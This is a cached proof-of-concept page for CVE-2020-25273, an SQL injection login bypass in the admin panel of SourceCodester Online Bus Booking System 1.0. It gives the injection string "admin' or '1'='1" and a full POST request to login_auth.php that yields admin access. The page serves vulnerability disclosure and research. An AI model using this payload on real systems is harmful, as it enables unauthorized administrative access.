CVE-2020-25273 PoC — SourceCodester Online Bus Booking System 授权问题漏洞

Source

https://github.com/Ko-kn3t/CVE-2020-25273

Associated Vulnerability

Title:SourceCodester Online Bus Booking System 授权问题漏洞 (CVE-2020-25273)
Description:SourceCodester Online Bus Booking System是个人开发者的一个在线公共汽车预定系统。该系统可以帮助公共汽车公司管理预定和售票流程。 SourceCodester Online Bus Booking System 1.0版本存在授权问题漏洞，该漏洞源于网络系统或产品中缺少身份验证措施或身份验证强度不足。

Description

Online Bus Booking System 1.0,  there is Authentication bypass on the Admin Login screen in admin.php via username or password SQL injection.

Readme

# CVE-2020-25273
Online Bus Booking System 1.0,  there is Authentication bypass on the Admin Login screen in admin.php via username or password SQL injection.

#Vendor - SourceCodester 

#Product -https://www.sourcecodester.com/php/14438/online-bus-booking-system-project-using-phpmysql.html V 1.0

#Vulnerability Type - Authentication Bypass

#Affected Component - bus_booking/admin.php

#Attack Type- Local

#Privilege Escalation - true

#Impact Code execution - true

> ***Attack Vector***

> 1) Go to Admin Login Panel and try to bypass
>
> 2) In request payload, set  
>
>    username : admin' or '1'='1
>
>    password :  admin' or '1'='1
>
>__________________________________
>
> POST /bus_booking/login_auth.php HTTP/1.1
>
> Cookie: PHPSESSID=5d6832eeb2a8dfd424c1b6dcd73745a0
>
> username=admin'+or+'1'%3D'1&password=admin'+or+'1'%3D'1
> 
>________________________________________________________
>
>Successfull logged in to Admin Dashboard

File Snapshot


 [4.0K]  /data/pocs/81691eb12db0913596851730a036eae3a948215a
└── [ 949]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!